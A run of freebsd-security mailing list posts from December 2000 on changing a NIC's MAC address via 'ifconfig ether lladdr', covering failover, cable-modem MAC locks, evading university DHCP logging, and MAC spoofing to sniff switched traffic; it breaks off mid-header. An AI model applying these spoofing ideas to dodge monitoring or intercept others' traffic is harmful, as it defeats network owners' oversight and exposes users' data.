(8.11.0/8.11.0) id eBB57lm18707; Sun, 10 Dec 2000 21:07:47 -0800 (PST) (envelope-from cjc) Date: Sun, 10 Dec 2000 21:07:47 -0800 From: "Crist J. Clark" To: Mikhail Kruk Cc: Daniel Hauer , freebsd-security@FreeBSD.ORG Subject: Re: MAC Address Message-ID: <20001210210747.R96105@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <3A3457AA.7507D386@enter.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from meshko@cs.brandeis.edu on Sun, Dec 10, 2000 at 11:34:16PM -0500 Sender: cjc@149.211.6.64.reflexcom.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Dec 10, 2000 at 11:34:16PM -0500, Mikhail Kruk wrote: > > Mikhail Kruk wrote: > > > > > > I'd want to do it because at our university there are plugs for laptops on > > > DHCP network, but DHCP server knows everyone's MAC address so all my > > > activity is logged when I use it. Changing my MAC address would open some > > > interesting posiblities. > > > >From a purely theoretical point of view, of course. > > > > > > > Dave, > > > > > > Sounds to me all this is just_slightly_unethical_if > > _not_bordering_on_illegal. This is a topic for a security mailing list? > > I thought we were here to boost network security, not circumvent it. > > Just a network technician's opinion. > > I said "purely theoretical" and I meant it. > However I'm seriously confused now. Is it really possible to change MAC > address from software as people say here? Of course. A Ethernet frame is just some bits sent out on a wire. If you can write raw frames to the wire, you can use whatever MAC address you want. And think about it, how would bridging work if you couldn't do this? > Isn't the whole point of MAC > address just the oposite? The whole point of hardware MAC addresses is that there is a unique address always available. It might not be used. Note that different systems do this in different ways. PC hardware needs a MAC on the card since there is no dependable unique value on other parts of the system (and for some reason people resist that coming about, remeber the PIII). Other hardware may work differently. For example, on a Sun machine, the unique machine ID is used to generate the MAC. All interfaces on a Sun box will have the same MAC in a default setup. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 21:33:28 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 21:33:26 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from firefly.prairienet.org (firefly.prairienet.org [192.17.3.3]) by hub.freebsd.org (Postfix) with ESMTP id 37CE137B400 for ; Sun, 10 Dec 2000 21:33:26 -0800 (PST) Received: from sherman.spotnet.org (slip-64.prairienet.org [192.17.3.84]) by firefly.prairienet.org (8.9.3/8.9.3) with ESMTP id XAA02720 for ; Sun, 10 Dec 2000 23:33:21 -0600 (CST) Date: Sun, 10 Dec 2000 23:33:20 -0600 (CST) From: David Talkington X-Sender: dtalk@sherman.spotnet.org To: freebsd-security@FreeBSD.ORG Subject: Re: MAC Address In-Reply-To: <3A3457AA.7507D386@enter.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Daniel Hauer wrote: > >Sounds to me all this is just_slightly_unethical_if >_not_bordering_on_illegal. This is a topic for a security mailing list? >I thought we were here to boost network security, not circumvent it. Knowing the ways in which the administrator's intent might be circumvented is the path to secure systems, and is therefore valuable information. -d To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 21:36: 6 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 21:36:02 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from master.mddsg.com (cc721767-a.hwrd1.md.home.com [24.180.128.61]) by hub.freebsd.org (Postfix) with ESMTP id 4D7DF37B400 for ; Sun, 10 Dec 2000 21:36:02 -0800 (PST) Received: from galifrey (dyn4 [192.168.2.204]) by master.mddsg.com (8.9.3/8.9.3) with SMTP id AAA25827; Mon, 11 Dec 2000 00:35:52 -0500 (EST) (envelope-from erickson@mddsg.com) Message-ID: <001801c06334$3bcfd7a0$cc02a8c0@columbia.mentis.org> From: "David Erickson" To: "Jeff Fulton" , "Will Mitayai Keeso Rowe" Cc: References: <01ee01c0632a$bdffad40$9214a8c0@plasmo> Subject: Re: MAC Address Date: Mon, 11 Dec 2000 00:35:55 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Exactly My cablemodem can be moved to another machine by reseting it. But once communication has started with that MAC address it will not listen. Implementing VRRP wont do what I want because it still see the MAC address of the primary machines nic not the vrrp mac address. But Im trying to put in place a little redundancy and the only way I can come up with is by monitoring on a seperate ethernet crossover between machines and when it stops responding to traffic over that link then I would assume the other machines MAC address. Similar to VRRP with the VRRP mac address being shared between multiple machines but only one machine using it at a time as the gateway. Dave ----- Original Message ----- From: "Jeff Fulton" To: "Will Mitayai Keeso Rowe" ; "David Erickson" Cc: Sent: Sunday, December 10, 2000 11:27 PM Subject: Re: MAC Address > Maybe to masquerade as another address to fool a dhcp server or even a > license server. > Some of the cable networks register your mac address and won't allow you to > connect from a different address, unless you call them up and ask to get it > changed. > There have also been a few nasty manufacturing events over the years when a > whole batch of cards got sent out all with identical mac addresses. > > Regards, > Jeff Fulton > > > ----- Original Message ----- > From: "Will Mitayai Keeso Rowe" > To: "David Erickson" > Cc: > Sent: Monday, December 11, 2000 3:08 PM > Subject: Re: MAC Address > > > > Dave, > > > > I'm sure you could work it out, but i'm curious as why you would want > > to do this? A MAC address provides a necessary function in it's sequences > > of set prefixes and it's sequence of unique suffixes. > > > > -Mit > > > > > > --- > > Will Mitayai Keeso Rowe > > Toronto, Ontario, Canada > > mitayai@dreaming.org > > > > On Sun, 10 Dec 2000, David Erickson wrote: > > > > > Is it possible to change the MAC address on a NIC through ifconfig or > any > > > other means or do I have to get a specific NIC that supports this > > > functionality? > > > > > > Dave Erickson > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 21:39:18 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 21:39:15 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from master.mddsg.com (cc721767-a.hwrd1.md.home.com [24.180.128.61]) by hub.freebsd.org (Postfix) with ESMTP id 9E6DA37B400 for ; Sun, 10 Dec 2000 21:39:14 -0800 (PST) Received: from galifrey (dyn4 [192.168.2.204]) by master.mddsg.com (8.9.3/8.9.3) with SMTP id AAA25837; Mon, 11 Dec 2000 00:39:12 -0500 (EST) (envelope-from erickson@mddsg.com) Message-ID: <004001c06334$b2e9f460$cc02a8c0@columbia.mentis.org> From: "David Erickson" To: , "Tony Landells" References: <200012110422.PAA23401@tungsten.austclear.com.au> Subject: Re: MAC Address Date: Mon, 11 Dec 2000 00:39:15 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thanks. I will look into this since I was planning on upgrading soon anyhow ;-) Dave ----- Original Message ----- From: "Tony Landells" To: Sent: Sunday, December 10, 2000 11:22 PM Subject: Re: MAC Address > > Someone had written a utility called setmac which used a KLD and utility > > program to do this under freebsd 3.x. I used it for a little while > > last year, and it worked well. You should be able to find it by doing a > > search of the mailing lists. (If the search engine's working. If you > > can't find it, e-mail me and I'll see if I still have it sitting around.) > > Or if you're on 4.2 or later you could use: > > ifconfig ether lladdr > > where you replace the and with your information. > > Tony > -- > Tony Landells > Senior Network Engineer Ph: +61 3 9677 9319 > Australian Clearing Services Pty Ltd Fax: +61 3 9677 9355 > Level 4, Rialto North Tower > 525 Collins Street > Melbourne VIC 3000 > Australia > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 21:43:33 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 21:43:31 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from master.mddsg.com (cc721767-a.hwrd1.md.home.com [24.180.128.61]) by hub.freebsd.org (Postfix) with ESMTP id CDA6637B400 for ; Sun, 10 Dec 2000 21:43:30 -0800 (PST) Received: from galifrey (dyn4 [192.168.2.204]) by master.mddsg.com (8.9.3/8.9.3) with SMTP id AAA25850; Mon, 11 Dec 2000 00:43:29 -0500 (EST) (envelope-from erickson@mddsg.com) Message-ID: <005801c06335$4b35afc0$cc02a8c0@columbia.mentis.org> From: "David Erickson" To: "Daniel Hauer" , References: <3A3457AA.7507D386@enter.net> Subject: Re: MAC Address Date: Mon, 11 Dec 2000 00:43:31 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ----- Original Message ----- From: "Daniel Hauer" To: Sent: Sunday, December 10, 2000 11:27 PM Subject: Re: MAC Address > Mikhail Kruk wrote: > > > > I'd want to do it because at our university there are plugs for laptops on > > DHCP network, but DHCP server knows everyone's MAC address so all my > > activity is logged when I use it. Changing my MAC address would open some > > interesting posiblities. > > >From a purely theoretical point of view, of course. > > > > > Dave, > > > Sounds to me all this is just_slightly_unethical_if > _not_bordering_on_illegal. This is a topic for a security mailing list? > I thought we were here to boost network security, not circumvent it. > Just a network technician's opinion. How is it unethical to change ones MAC address? First of all a MAC address is only used on your local LAN segment. MAC Addresses do not traverse over IP. Once your traffic hits a router the traffic is then relayed. ARP is used on individual segments to locate the MAC address that is answering for certain IP's. I just want to implement some redundancy on my cablemodem for some of the services I provide. Thus if I have a way to replace the MAC address like i can on Nokia's IPSO 3.2.1 or Sun or HP 9000's on PC hardware then i can have an entirely different standby machine assume that MAC address if it doesn't hear an answer from the other machine. > > -- > Regards, > Daniel Hauer. > http://www.enter.net "The Road To The Internet Starts There!" > *************************************************************************** > Windoze is for GAMES, UNIX is for the rest of us. > UNIX is like the sights on a loaded gun. If you aim the gun > at your foot and pull the trigger, it is the basic function of > UNIX to accurately deliver the bullet from the gun to the > target. In this case, it's your foot. > *************************************************************************** > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 21:51:55 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 21:51:53 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from irev.net (irev.net [63.101.244.233]) by hub.freebsd.org (Postfix) with ESMTP id 5700837B400 for ; Sun, 10 Dec 2000 21:51:53 -0800 (PST) Received: from cx443070b (cx443070-b.vista1.sdca.home.com [24.0.36.170]) by irev.net (8.11.0/8.9.3) with SMTP id eBB5pBt37578; Sun, 10 Dec 2000 21:51:11 -0800 (PST) (envelope-from data@irev.net) Message-ID: <001201c06336$aecd5550$aa240018@cx443070b> From: "Jeremiah Gowdy" To: "David Erickson" , "Jeff Fulton" , "Will Mitayai Keeso Rowe" Cc: References: <01ee01c0632a$bdffad40$9214a8c0@plasmo> <001801c06334$3bcfd7a0$cc02a8c0@columbia.mentis.org> Subject: DHCP beats MAC Address Date: Sun, 10 Dec 2000 21:53:26 -0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ----- Original Message ----- From: "David Erickson" To: "Jeff Fulton" ; "Will Mitayai Keeso Rowe" Cc: Sent: Sunday, December 10, 2000 9:35 PM Subject: Re: MAC Address > Exactly My cablemodem can be moved to another machine by reseting it. But > once communication has started with that MAC address it will not listen. > Implementing VRRP wont do what I want because it still see the MAC address > of the primary machines nic not the vrrp mac address. But Im trying to put > in place a little redundancy and the only way I can come up with is by > monitoring on a seperate ethernet crossover between machines and when it > stops responding to traffic over that link then I would assume the other > machines MAC address. Similar to VRRP with the VRRP mac address being > shared between multiple machines but only one machine using it at a time as > the gateway. > > Dave Indeed, the cable modem does remember your MAC address, HOWEVER, rather than resetting it, if you use DHCP, and you're using one of the services like @Home that has an account number for the address, like CX13245125-A, then the second computer to DHCP with the account number gets the address without resetting. So when I'm done using my desktop computer, and I plug in my laptop, the laptop DHCPs with the same account number, and gets the IP without resetting and resyncing. Of course my desktop computer has to be off, because it still has a valid DHCP lease on the IP. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 21:58:54 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 21:58:52 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from irev.net (irev.net [63.101.244.233]) by hub.freebsd.org (Postfix) with ESMTP id B6AED37B400 for ; Sun, 10 Dec 2000 21:58:51 -0800 (PST) Received: from cx443070b (cx443070-b.vista1.sdca.home.com [24.0.36.170]) by irev.net (8.11.0/8.9.3) with SMTP id eBB5wot37710; Sun, 10 Dec 2000 21:58:50 -0800 (PST) (envelope-from data@irev.net) Message-ID: <002a01c06337$c005f1a0$aa240018@cx443070b> From: "Jeremiah Gowdy" To: "Daniel Hauer" , References: <3A3457AA.7507D386@enter.net> Subject: Re: MAC Address Date: Sun, 10 Dec 2000 22:01:05 -0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > I'd want to do it because at our university there are plugs for laptops on > > DHCP network, but DHCP server knows everyone's MAC address so all my > > activity is logged when I use it. Changing my MAC address would open some > > interesting posiblities. > > Sounds to me all this is just_slightly_unethical_if > _not_bordering_on_illegal. This is a topic for a security mailing list? > I thought we were here to boost network security, not circumvent it. > Just a network technician's opinion. Illegal or unethical to mess with IP/DHCP/MAC configuration on a network ? So, if I connect to a public network and bind someone else's IP address, should I be punished ? Is that evil ? Come on. I'm a network admin, and even I don't take it that seriously. If someone on my network evades my logging somehow, then that violates my Terms of Service, and if I'm smart enough to detect them, I shut them down, and maybe ban them from the network. If I don't detect them, more power to them. I happen to be one of the people who think the burden of security is on the administrator to make the system secure, and not on the "hacker" (or whatever your favorite term is) to be nice enough not to exploit my network. How do you think network security is "boosted" ? By people not "hacking" things ? No offense, just this network administrator's opinion. If you're into network security, but you're not into a little hacking (your own system or someone else's), then you're not exactly seeing the whole picture. Security flaws are *often* fixed because someone exploits them. I'm not advocating abusing people's systems, but there's a certain amount of Necessary Evil that has to be done. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 21:59:19 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 21:59:17 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from moek.pir.net (moek.pir.net [209.192.237.190]) by hub.freebsd.org (Postfix) with ESMTP id 4435F37B400 for ; Sun, 10 Dec 2000 21:59:17 -0800 (PST) Received: from pir by moek.pir.net with local (Exim) id 145LzY-0004Du-00 for freebsd-security@FreeBSD.ORG; Mon, 11 Dec 2000 00:59:16 -0500 Date: Mon, 11 Dec 2000 00:59:15 -0500 From: Peter Radcliffe To: freebsd-security@FreeBSD.ORG Subject: Re: DHCP beats MAC Address Message-ID: <20001211005915.D9158@pir.net> Reply-To: freebsd-security@freebsd.org Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <01ee01c0632a$bdffad40$9214a8c0@plasmo> <001801c06334$3bcfd7a0$cc02a8c0@columbia.mentis.org> <001201c06336$aecd5550$aa240018@cx443070b> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <001201c06336$aecd5550$aa240018@cx443070b>; from data@irev.net on Sun, Dec 10, 2000 at 09:53:26PM -0800 X-fish: < X-Copy-On-Listmail: Please do NOT Cc: me on list mail. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jeremiah Gowdy probably said: > Indeed, the cable modem does remember your MAC address, HOWEVER, rather than > resetting it, if you use DHCP, and you're using one of the services like > @Home that has an account number for the address, like CX13245125-A, then > the second computer to DHCP with the account number gets the address without Every cable modem I've seen in the US, although I have not seen the @home ones, filters on MAC addresses and only allows N through (where N is normally one or you pay for more). The cable modem lets through the first N MAC addresses it sees. In this case you have no choice but to reset the modem or change the MAC address. This has been hashed through on several FreeBSD lists before. P. -- pir pir@pir.net pir@net.tufts.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 22:15:39 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 22:15:37 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mercury.ccmr.cornell.edu (mercury.ccmr.cornell.edu [128.84.231.97]) by hub.freebsd.org (Postfix) with ESMTP id 33FCD37B400 for ; Sun, 10 Dec 2000 22:15:37 -0800 (PST) Received: from opal.ccmr.cornell.edu (IDENT:0@opal.ccmr.cornell.edu [128.84.231.116]) by mercury.ccmr.cornell.edu (8.9.3/8.9.3) with ESMTP id BAA27572 for ; Mon, 11 Dec 2000 01:15:36 -0500 Received: from localhost (mitch@localhost) by opal.ccmr.cornell.edu (8.9.3/8.9.3) with ESMTP id BAA16672 for ; Mon, 11 Dec 2000 01:15:35 -0500 X-Authentication-Warning: opal.ccmr.cornell.edu: mitch owned process doing -bs Date: Mon, 11 Dec 2000 01:15:35 -0500 (EST) From: Mitch Collinsworth To: freebsd-security@FreeBSD.ORG Subject: Re: DHCP beats MAC Address In-Reply-To: <20001211005915.D9158@pir.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 11 Dec 2000, Peter Radcliffe wrote: > Jeremiah Gowdy probably said: > > Indeed, the cable modem does remember your MAC address, HOWEVER, rather than > > resetting it, if you use DHCP, and you're using one of the services like > > @Home that has an account number for the address, like CX13245125-A, then > > the second computer to DHCP with the account number gets the address without > > Every cable modem I've seen in the US, although I have not seen the > @home ones, filters on MAC addresses and only allows N through (where > N is normally one or you pay for more). The cable modem lets through > the first N MAC addresses it sees. > > In this case you have no choice but to reset the modem or change the > MAC address. > > This has been hashed through on several FreeBSD lists before. Well like you said you haven't seen the @home setup. Jeremiah's description matches my experience with @home. You can use multiple systems (i.e. mac addresses) without resetting the cable modem, but you have to re-use the account #. -Mitch To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 22:25: 5 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 22:25:04 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from moek.pir.net (moek.pir.net [209.192.237.190]) by hub.freebsd.org (Postfix) with ESMTP id EEA9937B400 for ; Sun, 10 Dec 2000 22:25:03 -0800 (PST) Received: from pir by moek.pir.net with local (Exim) id 145MOU-0004MS-00 for freebsd-security@FreeBSD.ORG; Mon, 11 Dec 2000 01:25:02 -0500 Date: Mon, 11 Dec 2000 01:25:02 -0500 From: Peter Radcliffe To: freebsd-security@FreeBSD.ORG Subject: Re: DHCP beats MAC Address Message-ID: <20001211012502.E9158@pir.net> Reply-To: freebsd-security@freebsd.org Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <20001211005915.D9158@pir.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from mitch@ccmr.cornell.edu on Mon, Dec 11, 2000 at 01:15:35AM -0500 X-fish: < X-Copy-On-Listmail: Please do NOT Cc: me on list mail. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Mitch Collinsworth probably said: > Well like you said you haven't seen the @home setup. Jeremiah's > description matches my experience with @home. You can use multiple > systems (i.e. mac addresses) without resetting the cable modem, but > you have to re-use the account #. My point was that not all cable modems operate in the same way, as was being implied. I repeat, this has been hashed through several times before and has nothing to do with freebsd or security. P. -- pir pir@pir.net pir@net.tufts.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 3:59: 2 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 03:58:56 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 06AEA37B6E9 for ; Mon, 11 Dec 2000 03:58:14 -0800 (PST) Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by mx1.FreeBSD.org (Postfix) with ESMTP id B15FB6E2D44 for ; Sun, 10 Dec 2000 23:22:14 -0800 (PST) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 145NCe-0003Lk-00; Mon, 11 Dec 2000 09:16:52 +0200 Date: Mon, 11 Dec 2000 09:16:52 +0200 (IST) From: Roman Shterenzon To: David Erickson Cc: Subject: Re: MAC Address In-Reply-To: <005801c06335$4b35afc0$cc02a8c0@columbia.mentis.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 11 Dec 2000, David Erickson wrote: > > Sounds to me all this is just_slightly_unethical_if > > _not_bordering_on_illegal. This is a topic for a security mailing list? > > I thought we were here to boost network security, not circumvent it. > > Just a network technician's opinion. > > How is it unethical to change ones MAC address? First of all a MAC address > is only used on your local LAN segment. MAC Addresses do not traverse over > IP. Once your traffic hits a router the traffic is then relayed. ARP is The most interesting question is if I know some mac address on a switched network and then I set my mac address to this address, if some switches _will_ deliver packets to me as well? It might be interesting sniffing strategy on a switched network if some switches work this way. Thoughts? --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 4: 0: 3 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 03:59:55 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C546637B708 for ; Mon, 11 Dec 2000 03:58:15 -0800 (PST) Received: from dsms.com (hybrid-024-221-180-186.ca.sprintbbd.net [24.221.180.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id 64A366E2E01 for ; Mon, 11 Dec 2000 00:06:13 -0800 (PST) Received: from dsms.com (bp-61.sm.dsms.com [199.89.215.61]) by dsms.com (8.9.3/8.9.3) with ESMTP id AAA48753; Mon, 11 Dec 2000 00:06:42 -0800 (PST) Message-ID: <3A3489D4.100E8B41@dsms.com> Date: Mon, 11 Dec 2000 00:01:24 -0800 From: harold barker Reply-To: hvb@dsms.com Organization: Dark Side of the Moon SoftWare X-Mailer: Mozilla 4.76 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: "freebsd-security@FreeBSD.ORG" Subject: RCA cable modem Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Anyone care to share the default ip address and password that @home uses for the RCA modems. I am looking to grab the stats, so that i can help the clue less tech when mine does down. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 4: 8:52 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 04:08:45 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 31B2D37B400 for ; Mon, 11 Dec 2000 04:08:45 -0800 (PST) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id C79766E2EEB for ; Mon, 11 Dec 2000 01:10:11 -0800 (PST) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id KAA54262; Mon, 11 Dec 2000 10:08:49 +0100 (CET) (envelope-from des@ofug.org) Sender: des@ofug.org X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "David Erickson" Cc: Subject: Re: MAC Address References: <000701c06315$84e46ec0$cc02a8c0@columbia.mentis.org> From: Dag-Erling Smorgrav Date: 11 Dec 2000 10:08:48 +0100 In-Reply-To: "David Erickson"'s message of "Sun, 10 Dec 2000 20:56:03 -0500" Message-ID: Lines: 10 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "David Erickson" writes: > Is it possible to change the MAC address on a NIC through ifconfig or any > other means or do I have to get a specific NIC that supports this > functionality? 'man ifconfig' DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 4:44:24 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 04:44:22 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from sr14.nsw-remote.bigpond.net.au (unknown [24.192.3.29]) by hub.freebsd.org (Postfix) with ESMTP id C0B0A37B400 for ; Mon, 11 Dec 2000 04:44:20 -0800 (PST) Received: from fulton.net.au (CPE-144-132-180-48.nsw.bigpond.net.au [144.132.180.48]) by sr14.nsw-remote.bigpond.net.au (Pro-8.9.3/8.9.3) with SMTP id XAA20171; Mon, 11 Dec 2000 23:44:14 +1100 (EDT) Received: from amoeba (dhcp32.fulton.net.au [192.168.1.32]) by fulton.net.au (8.11.1/8.11.1) with SMTP id eBBCiAN08867; Mon, 11 Dec 2000 23:44:12 +1100 (EST) (envelope-from jefff@fulton.net.au) Message-ID: <020401c06370$1ca77f40$2001a8c0@amoeba> From: "Jeff Fulton" To: "Roman Shterenzon" , "David Erickson" Cc: References: Subject: Re: MAC Address Date: Mon, 11 Dec 2000 23:44:30 +1100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The switch learns your location when it processes a packet sent by you. Once you're in the station cache, you'll get timed out if you don't send anything for a minute or two. If a rogue duplicate sends something, the station cache will be modified to point to him. Of course, it may change straight back if the real owner transmits something again. I don't think both the rogue and the duplicate can be in the station cache at the same time. Regards, jeff Fulton ----- Original Message ----- From: "Roman Shterenzon" To: "David Erickson" Cc: Sent: Monday, December 11, 2000 6:16 PM Subject: Re: MAC Address > On Mon, 11 Dec 2000, David Erickson wrote: > > > > Sounds to me all this is just_slightly_unethical_if > > > _not_bordering_on_illegal. This is a topic for a security mailing list? > > > I thought we were here to boost network security, not circumvent it. > > > Just a network technician's opinion. > > > > How is it unethical to change ones MAC address? First of all a MAC address > > is only used on your local LAN segment. MAC Addresses do not traverse over > > IP. Once your traffic hits a router the traffic is then relayed. ARP is > > The most interesting question is if I know some mac address on a switched > network and then I set my mac address to this address, if some switches > _will_ deliver packets to me as well? It might be interesting sniffing > strategy on a switched network if some switches work this way. > Thoughts? > > --Roman Shterenzon, UNIX System Administrator and Consultant > [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 4:58: 2 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 04:57:57 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from master.mddsg.com 